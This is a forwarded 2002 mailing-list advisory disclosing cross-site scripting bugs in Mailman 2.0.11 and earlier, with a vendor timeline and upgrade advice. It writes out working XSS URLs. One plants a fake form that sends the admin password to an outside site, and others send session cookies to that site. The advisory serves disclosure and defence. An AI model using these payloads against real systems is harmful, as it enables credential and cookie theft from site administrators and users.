[For Mailman admins: please upgrade -- Raju] This is an RFC 1153 digest. (1 message) ----------------------------------------------------------------------
Message-Id: <[EMAIL PROTECTED]> From: office <[EMAIL PROTECTED]> To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: cross-site scripting bug of Mailman Date: Wed, 24 Jul 2002 17:03:30 +0900 Mailman: cross-site scripting bug Product: Mailman Affected Version: 2.0.11 and under it Vendor's URL: http://www.gnu.org/software/mailman/ Solution: Use fixed version 2.0.12 or later Introduction: ------------ Mailman is software to help manage electronic mail discussion lists, much like Majordomo or Smartmail. And Mailman have web interface system. Example: ----------------- This is simple example for version 2.0.10: You can recognize the vulnerability with this type of URL; http://mailman_site/mailman_dirctory/admin/ml-name?";><script>alert("hello")</script> and that prove that any (malicious) script code is possible on web interface part of Mailman. For example, if you access to this URL with Internet Explorer (other browser is not affected by the URL), the page figure is similar to real one, but the password of admin you enter and submit are send to another malicious site (http://www.office.ac/). This URL are valid for version 2.0.10. http://mailman_site/mailman_dirctory/admin/ml-name?adminpw=";></form><form/action="http://www.office.ac/webform.cgi"/method="post";><br And Mailman 2.0.11 still have vulnerabilities, if you access to these URL with Internet Explorer (other browser is not affected by these URL), your information in cookie about the mailman_site could be send another malicious site (http://www.office.ac/). http://mailman_site/mailman_dirctory/admin/ml-name?adminpw="/onClick="window.open('http://www.office.ac/j.cgi?'+document.cookie); http://mailman_site/mailman/subscribe/ml-name?info=<script>document.location%3D"http://www.office.ac/j.cgi?"%2Bdocument.cookie;</script> Vendor's response: -------------- The vendor were notified about first problem on 20th of May 2002. On same 20th May 2002, version 2.0.11 was released. http://mail.python.org/pipermail/mailman-announce/2002-May/000042.html And the vendor were notified about other problems on 21st of May 2002. The fixed version 2.0.12 was released on 11th of Jul 2002. http://mail.python.org/pipermail/mailman-announce/2002-July/000043.html Solution: -------------- Users should upgrade to Mailman 2.0.12 or later -- office [EMAIL PROTECTED] [EMAIL PROTECTED] http://www.office.ac/ ------------------------------ End of this Digest ****************** -- Raju Mathur [EMAIL PROTECTED] http://kandalaya.org/ It is the mind that moves ================================================ To unsubscribe, send email to [EMAIL PROTECTED] with unsubscribe in subject header. Check archives at http://www.mail-archive.com/ilugd%40wpaa.org
